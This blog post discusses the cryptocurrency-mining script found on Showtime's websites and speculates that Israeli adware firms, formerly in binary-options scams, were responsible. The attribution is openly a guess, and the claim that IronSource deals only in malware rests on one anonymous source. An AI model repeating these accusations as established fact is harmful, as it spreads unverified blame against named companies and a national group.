Israel, Organized Crime and Cryptocurrency Mining

The websites of US telly giant CBS’s Showtime contained JavaScript that secretly commandeered viewers’ web browsers over the weekend to mine cryptocurrency.
The flagship Showtime.com and its instant-access ShowtimeAnytime.com sibling silently pulled in code that caused browsers to blow spare processor time calculating new Monero coins — a privacy-focused alternative to the ever-popular Bitcoin. The hidden software typically consumed as much as 60 per cent of CPU capacity on computers visiting the sites.
The JavaScript, which appeared on the sites at the start of the weekend and vanished by Monday, sits between HTML comment tags that appear to be an insert from web analytics biz New Relic. Again, it is unlikely that an analytics company would deliberately stash coin-mining scripts onto its customers’ pages, so the code must have come from another source — or was injected by miscreants who had compromised Showtime’s systems.

Who could have done such a thing? I have a pretty good guess.

As detailed by Simona Weinglass’ excellent series of articles in the Times of Israel, for a long time, Israel was a major center of forex and binary option scam companies. Users would see their advertising online, sign up thinking they were going to make money as “traders,” and be cheated out of everything by “brokers”. The entire setup was as rigged as three card monte. The companies were/are earning (stealing) $5–10 billion per year. An entire ecosystem based around providing these companies with services and personnel evolved.

The binary options companies have been able to do this for several reasons:

  1. They were backed by wealthy investors. It is possible that some of these investors are criminals laundering money; it is also possible that they are legitimate businessmen who are simply unscrupulous about the source of their revenues.
  2. They had bought off Israeli politicians. For instance, Likud Member of the Knesset David Bitan, the current Coalition Chairman, has been fighting the recent bills introduced to ban the binary options industry tooth and nail. Why? “A source who remained told The Times of Israel that Bitan told Azaria and other government officials that a family prominently involved in SpotOption are leaders of the Georgian faction of the Likud Central Committee and that he needs their support to maintain his position in the Likud.”
  3. They had access to a deep pool of tech and sales talent. The former was provided by the same pool that feeds Israel’s legitimate high-tech businesses. The technological units of the IDF and Israel’s universities turn out great software engineers. The latter was provided by the endless stream of immigrants from America and Europe, who have poor Hebrew, no connections, find it difficult to make ends meet and maintain a reasonable standard of living in Israel’s expensive economy, and are desperate for work which will allow them to make a decent wage. Job ads for “account managers” for “international financial companies” were ubiquitous on the English-language Israeli press.

All good things, however, must come to an end. As far back as five years ago, the writing was on the wall for the binary/forex industries. In recent years, they’ve been suffering increasing exposure from the media, law enforcement and legislators.

Fortunately, there is another industry for the technical talent and investment money to flow to: malware.

It’s no secret that Israel has had a thriving malware industry for over a decade. Wikipedia says:

Download Valley is a cluster of software companies in Israel, producing and delivering adware to be installed alongside downloads of other software. The primary purpose is to monetize free software and downloads. These software items are commonly browser toolbars, adware, browser hijackers, spyware, and malware. Another group of products are download managers, possibly designed to induce or trick the user to install adware, when downloading a piece of desired software or mobile app from a certain source.

The way it works is like this: you go to a software download site like Softonic, Download.com or SourceForge, and install a free piece of software. That software comes bundled with a piece of malware, often built by these companies, which either changes the content of sites you visit to advertise certain products, or just bombards you with popups. The malware can be very sophisticated, behaving differently depending on the operating system and location of the infected computer, the behavior of the user, or any other quantifiable factor. The advertising space is sold to third party companies. Since the user technically agreed to install the malware (via the small print or a pre-checked box,) the whole thing is not criminally punishable.

Thus, you see companies like IronSource, whose entire business is malware, making money by hurting people. I spoke to a former senior engineer at IronSource recently and asked him whether they produced anything but malware. He quite frankly told me that they do not. And these companies are being treated as Israeli high tech celebrities.

Of course, the key to the whole thing is monetization. It’s one thing to infect people’s computers, and quite another to make money off the process. You can do malwaretising, as described above, but it’s quite difficult-you are competing with legitimate advertising channels, which themselves are increasingly less effective. Adtech is failing, and that means that it’s harder to make money with malwaretising.

So where does that leave us?

If I had to guess, the next logical step is that Israeli malware companies, which are to some degree staffed by intelligent (though unethical) people, are cutting out the middleman. Why try to sell access to infected computers for money when you can use their resources to mine cryptocurrency and make money directly?

The details of the Showtime hack suggest that whoever was setting up the malware was significantly stupider than whoever wrote it. Having the malware steal 60% of the infected computer’s CPU resources practically guarantees getting caught. This suggests that the people using the malware had bought it from the ones who developed it, which in turn suggests that a market emerged some time ago. If anyone with inside knowledge would like to discuss, they can drop me a line at my email, boris.kogan81@gmail.com.